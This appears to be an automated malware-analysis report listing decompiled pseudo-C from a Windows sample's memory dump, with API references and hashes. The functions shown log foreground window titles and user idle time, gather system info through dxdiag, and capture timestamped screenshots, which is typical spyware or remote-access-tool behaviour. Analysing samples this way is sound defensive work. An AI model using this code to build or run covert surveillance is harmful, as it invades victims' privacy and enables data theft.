                              0x004481bf
                              0x004481c4
                              0x004481cd
                              0x004481d5
                              0x004481d6
                              0x004481d6
                              0x004481dc
                              0x004481df
                              0x004481df
                              0x004481e2
                              0x004481e9
                              0x004481eb
                              0x004481ef
                              0x004481f7
                              0x004481fe
                              0x00448204
                              0x00448205
                              0x00448205
                              0x0044820c
                              0x0044820e
                              0x00448213
                              0x0044821b
                              0x00448220
                              0x00448221
                              0x00448221
                              0x00448224
                              0x00448227
                              0x0044822a
                              0x0044822d
                              0x0044822d
                              0x0044823f

                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 0044813A
                                • Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447361
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447373
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447385
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447397
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447403
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447415
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447427
                              • _free.LIBCMT ref: 0044812F
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD
                              • _free.LIBCMT ref: 00448151
                              • _free.LIBCMT ref: 00448166
                              • _free.LIBCMT ref: 00448171
                              • _free.LIBCMT ref: 00448193
                              • _free.LIBCMT ref: 004481A6
                              • _free.LIBCMT ref: 004481B4
                              • _free.LIBCMT ref: 004481BF
                              • _free.LIBCMT ref: 004481F7
                              • _free.LIBCMT ref: 004481FE
                              • _free.LIBCMT ref: 0044821B
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
                              • Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409197, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00409197(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = L00402469();
						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
						_t112 = 0x46dcf4;
						if(L00409EAE(0x46dcf4) == 0) {
							L00409DD4(0x46dcf4,  &_v100);
							E00407341(L00402469() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								L00408B82(_t119);
								L00401ED0();
							} else {
								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
								L00409636(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					L00409C17(_t119);
					if(L00416B2E(_t119) < 0xea60) {
						L18:
						L00401ED0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = L00416B2E(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								L0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E0040530D(_t77,  &_v80, L004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								L00416C32(_t127, _t50);
								L00408B82(_t119);
								L00401FA7();
								L00401FA7();
								L00401FA7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401ED0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}






















                              0x00409197
                              0x0040919d
                              0x004091a0
                              0x004091a1
                              0x004091a3
                              0x004091a5
                              0x00409204
                              0x00409210
                              0x00409213
                              0x0040921d
                              0x00409225
                              0x0040922c
                              0x00409236
                              0x00409247
                              0x0040924d
                              0x0040925d
                              0x00409269
                              0x0040927d
                              0x00409282
                              0x00409289
                              0x00409290
                              0x004092ba
                              0x004092be
                              0x004092c6
                              0x004092cf
                              0x00409292
                              0x00409295
                              0x0040929c
                              0x0040929c
                              0x00409290
                              0x0040925d
                              0x004092d4
                              0x004092d6
                              0x004092e7
                              0x0040938f
                              0x00409393
                              0x00000000
                              0x004092ed
                              0x004092ed
                              0x004092f1
                              0x00409301
                              0x00409308
                              0x00409328
                              0x0040932b
                              0x0040935c
                              0x00409361
                              0x00409364
                              0x00409368
                              0x0040936f
                              0x00409378
                              0x00409381
                              0x0040938a
                              0x00000000
                              0x0040938a
                              0x0040930a
                              0x00409311
                              0x00409315
                              0x00409315
                              0x004093a1
                              0x00000000
                              0x004093a1
                              0x004092e7
                              0x004093a8
                              0x004093ae

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004091F9
                              • Sleep.KERNEL32(000001F4), ref: 00409204
                              • GetForegroundWindow.USER32 ref: 0040920A
                              • GetWindowTextLengthW.USER32(00000000), ref: 00409213
                              • GetWindowTextW.USER32 ref: 00409247
                              • Sleep.KERNEL32(000003E8), ref: 00409315
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                                • Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 107669343-3343415809
                              • Opcode ID: 8ef25fe324020487e23ec3656bc125fa0763a2f62380acee8a23ca220aecaf57
                              • Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
                              • Opcode Fuzzy Hash: 8ef25fe324020487e23ec3656bc125fa0763a2f62380acee8a23ca220aecaf57
                              • Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044F2E4, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DecodePointer
                              • String ID: acos$asin$exp$log$log10$pow$sqrt$@
                              • API String ID: 3527080286-3098891844
                              • Opcode ID: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
                              • Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
                              • Opcode Fuzzy Hash: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
                              • Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413012, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 112sleepfileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E00413012(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				L00401ED0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401ED0();
				E004020B5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401ECB( &_v76);
					_t87 =  &_v28;
					E00417334(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409DB7() != 0 && _t92 < 0x4b0);
				if(L00409DB7() == 0) {
					DeleteFileW(L00401ECB( &_v76));
					L00404818(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = L004049D2(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						_t16 =  &_a4; // 0x412c62
						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52, _t16, 0x46c238), _t102,  &_v28);
						_push(0x97);
						L00404A6E(_t55,  &_v180, _t49, _t102);
						L00401FA7();
						L00404DD5( &_v180);
						_t55 = 1;
					}
					L00404DF9(_t55,  &_v180, _t93);
				}
				L00401FA7();
				L00401ED0();
				L00401FA7();
				return _t55;
			}



















                              0x00413012
                              0x0041303c
                              0x00413045
                              0x0041304a
                              0x00413073
                              0x0041307c
                              0x00413084
                              0x00413089
                              0x0041308b
                              0x0041308e
                              0x00413093
                              0x00413098
                              0x0041309f
                              0x004130a8
                              0x004130ae
                              0x004130c4
                              0x004130d3
                              0x004130e1
                              0x004130e6
                              0x004130f1
                              0x004130f6
                              0x004130f7
                              0x004130f8
                              0x004130f9
                              0x004130fa
                              0x004130ff
                              0x00413101
                              0x00413109
                              0x0041310b
                              0x00413121
                              0x00413127
                              0x00413132
                              0x0041313a
                              0x00413145
                              0x0041314a
                              0x0041314a
                              0x00413152
                              0x00413152
                              0x0041315a
                              0x00413162
                              0x0041316a
                              0x00413177

                              APIs
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • Sleep.KERNEL32(00000064), ref: 0041309F
                              • DeleteFileW.KERNEL32(00000000), ref: 004130D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                              • String ID: /t $\sysinfo.txt$b,A$dxdiag$open$temp
                              • API String ID: 2701014334-3646109375
                              • Opcode ID: 06a9efe08f1e71f62d430d38452395e7d8c1355bfafde8ad9fbb57586f9eb49e
                              • Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
                              • Opcode Fuzzy Hash: 06a9efe08f1e71f62d430d38452395e7d8c1355bfafde8ad9fbb57586f9eb49e
                              • Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004152D7, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E004152D7() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				L00450918(0x451ece, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					L00413D5E(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					L00401EDA(0x46c880, _t132, _t141, L0041481D(_t146 - 0x40));
					L00401ED0();
				}
				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
				_t45 = L00401ECB(L00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
				L00401ED0();
				L00401ED0();
				CreateDirectoryW(L00401ECB(0x46c868), _t92);
				L00401F4D(_t92, _t146 - 0xb0);
				L00401F4D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L5:
				while(1) {
					if( *_t54 != 1) {
						L10:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, L00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_t72 = L00401ECB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L10;
						}
						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040425F(_t92, _t148, _t83);
						_t85 = L00417417(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L10;
						}
						Sleep(0x3e8);
					}
					goto L10;
				}
			}




















                              0x004152dc
                              0x004152e8
                              0x004152ea
                              0x004152ed
                              0x004152ef
                              0x004152f2
                              0x004152f8
                              0x004152fa
                              0x004152fd
                              0x00415300
                              0x0041530e
                              0x0041530e
                              0x00415314
                              0x0041531a
                              0x0041532a
                              0x00415332
                              0x00415332
                              0x00415347
                              0x00415363
                              0x00415369
                              0x0041537c
                              0x00415384
                              0x0041538c
                              0x0041539a
                              0x004153a6
                              0x004153ae
                              0x004153b3
                              0x004153b6
                              0x004153c7
                              0x004153cd
                              0x004153d0
                              0x004153d3
                              0x00000000
                              0x004153d9
                              0x004153dc
                              0x00415424
                              0x00415428
                              0x00415432
                              0x00415437
                              0x0041543c
                              0x00415441
                              0x00415446
                              0x00415454
                              0x00415459
                              0x00415498
                              0x004154a0
                              0x004154a8
                              0x004154b3
                              0x004154bb
                              0x004154c3
                              0x004154c8
                              0x004154d5
                              0x004154d8
                              0x004154f6
                              0x004154f8
                              0x0041550f
                              0x0041550f
                              0x004154da
                              0x004154ee
                              0x004154ee
                              0x00415517
                              0x00415519
                              0x00000000
                              0x00415519
                              0x004153de
                              0x004153e3
                              0x004153e6
                              0x004153e6
                              0x004153e8
                              0x00000000
                              0x00000000
                              0x004153f8
                              0x004153fd
                              0x00415403
                              0x0041540a
                              0x0041540f
                              0x00415412
                              0x00415414
                              0x00415419
                              0x00000000
                              0x00000000
                              0x00415420
                              0x00415420
                              0x00000000
                              0x004153e6

                              APIs
                              • __EH_prolog.LIBCMT ref: 004152DC
                              • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                                • Part of subcall function 0041510D: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166
                                • Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
                              • Sleep.KERNEL32(000003E8), ref: 00415420
                              • GetLocalTime.KERNEL32(?), ref: 00415428
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 3280235481-3790400642
                              • Opcode ID: 38ebd0105778573f40249f35b2c97ab44ec1ff7730162a3710061e6861f9b870
                              • Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
                              • Opcode Fuzzy Hash: 38ebd0105778573f40249f35b2c97ab44ec1ff7730162a3710061e6861f9b870
                              • Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004450E7, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = L00439E01();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(L00439E14())) = 9;
						L59:
						_t145 = E0043626D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = L0043E61D(_t224, _t158);
								L0043EE85(0);
								L0043EE85(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = L0044471C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = L0044D987(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													L00439DDE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(L00439E14())) = 9;
											 *(L00439E01()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = L00444C43();
												} else {
													_t176 = L00444F53();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(L00439E14())) = 0xc;
									 *(L00439E01()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									L0043EE85(_t246);
									return _t242;
								}
							}
							L15:
							 *(L00439E01()) =  *_t206 & _t246;
							 *((intOrPtr*)(L00439E14())) = 0x16;
							E0043626D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(L00439E01()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(L00439E14())) = 0x16;
					goto L59;
				} else {
					 *(L00439E01()) =  *_t212 & 0x00000000;
					_t145 = L00439E14();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                              0x004450f0
                              0x004450f7
                              0x00445111
                              0x00445113
                              0x0044547b
                              0x0044547b
                              0x00445480
                              0x00445480
